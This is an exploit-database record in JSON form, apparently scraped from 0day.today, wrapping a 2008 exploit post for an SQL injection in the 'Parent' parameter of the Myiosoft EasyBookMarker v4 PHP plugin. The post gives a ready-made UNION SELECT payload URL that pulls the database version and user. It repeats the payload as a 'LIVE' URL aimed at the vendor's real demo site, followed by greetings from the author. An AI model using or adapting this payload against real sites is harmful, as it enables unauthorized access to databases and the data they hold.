Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability

{"type": "zdt", "lastseen": "2016-04-20T01:44:23", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability", "published": "2008-11-07T00:00:00", "href": "http://0day.today/exploit/description/4125", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for unknown platform in category web applications", "hash": "5aa6988ab67b8333d917359c6a7b6cb7c2d74f2dfe7a86b80727171a5aaac2d5", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "===============================================================\r\nMyiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n==============================================================================\r\n\tMyiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability\r\n==============================================================================\r\n\r\n\t[\u00c2\u00bb] Script: [ Myiosoft EasyBookMarker ]\r\n\t[\u00c2\u00bb] Language: [ PHP ]\r\n\t[\u00c2\u00bb] Website: [ http://myiosoft.com/?1.4.0.0 ]\r\n\t[\u00c2\u00bb] Type: [ Commercial ]\r\n\t[\u00c2\u00bb] Report-Date: [ 07.11.2008 ]\r\n\t[\u00c2\u00bb] Founder: [ G4N0K ]\r\n\r\n\r\n===[ XPL ]===\r\n\r\n\t[\u00c2\u00bb] http://localhost/[path]/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--\r\n\r\n\r\n===[ LIVE ]===\r\n\r\n\t[\u00c2\u00bb] http://myiosoft.com/products/EasyBookMarker/demo/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--\r\n\r\n\r\n\r\n\t\r\n===[ Greetz ]===\r\n\r\n\t[\u00c2\u00bb] ALLAH\r\n\t[\u00c2\u00bb] Tornado2800 \r\n\t[\u00c2\u00bb] Hussain-X \r\n\r\n\t//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)\r\n\t//ALLAH,forgimme...\r\n\r\n===============================================================================\r\nexit(); //EoX\r\n===============================================================================\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-4125", "sourceHref": "http://0day.today/exploit/4125", "modified": "2008-11-07T00:00:00", "reporter": "G4N0K", "enchantments": {"vulnersScore": 6.0}}